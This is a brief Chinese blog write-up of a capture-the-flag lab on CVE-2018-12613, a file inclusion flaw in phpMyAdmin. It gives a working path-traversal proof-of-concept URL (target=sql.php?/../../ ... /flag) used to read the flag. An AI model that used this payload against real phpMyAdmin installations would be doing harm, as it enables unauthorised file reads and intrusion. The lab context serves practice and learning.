春秋云境CVE-2018-12613

1.阅读靶场介绍

index.php中存在一处文件包含逻辑

可以理解为对url做处理

能想到的就是../../../../../flag

2.启动靶场

如上图所示

看到这个界面我想到的就是select flag from flag出来

但是本博主没有找到哟

期待各位大神的评论

3.poc

这里博主是通过这个处理过的url夺旗的

如下所示

url在这里哟

各位可以参考参考哟

复制代码
https://eci-2ze8e04kno5d57s1geyi.cloudeci1.ichunqiu.com:80/?target=sql.php?/../../../../../../../../flag

到此,相信各位都完成夺旗了

感谢您宝贵的时间

相关推荐
tntxia8 小时前
网络安全漏洞修复(一)
安全
泯泷2 天前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷2 天前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
Flynt6 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
冬奇Lab11 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
Aphasia31114 天前
VPN 与内网穿透
安全
Mr_愚人派15 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao16 天前
【无标题】
人工智能·安全
Alsn8616 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院16 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展